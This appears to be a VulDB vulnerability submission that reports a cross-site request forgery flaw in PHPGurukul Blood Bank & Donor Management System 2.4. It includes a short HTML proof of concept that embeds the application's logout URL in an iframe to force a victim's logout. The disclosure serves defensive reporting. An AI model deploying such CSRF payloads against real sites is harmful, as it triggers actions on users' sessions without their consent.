| Titel | https://phpgurukul.com/ Blood Bank & Donor Management System v2.4 CSRF Improper Input Validation |
|---|
| Beschreibung | There is no CSRF Token allowing attacker to generate any activities including logout. . Attacker can embed a iframe that has the logout url and send it to the victim. If
the victim clicks on the link, he will automatically get logged out.
<html>
<body>
<iframe
src="http://localhost/bbdms/logout.php"
style="border:0px #FFFFFF none;"
name="myLogoutFrame"
scrolling="no"
frameborder="1"
marginheight="0px"
marginwidth="0px"
height="400px"
width="600px"
allowfullscreen>
</iframe>
</body>
</html>
|
|---|
| Benutzer | Lo1x (UID 79468) |
|---|
| Einreichung | 25.12.2024 16:23 (vor 1 Jahr) |
|---|
| Moderieren | 25.12.2024 19:24 (3 hours later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 289318 [PHPGurukul Blood Bank & Donor Management System 2.4 /logout.php Cross Site Request Forgery] |
|---|
| Punkte | 17 |
|---|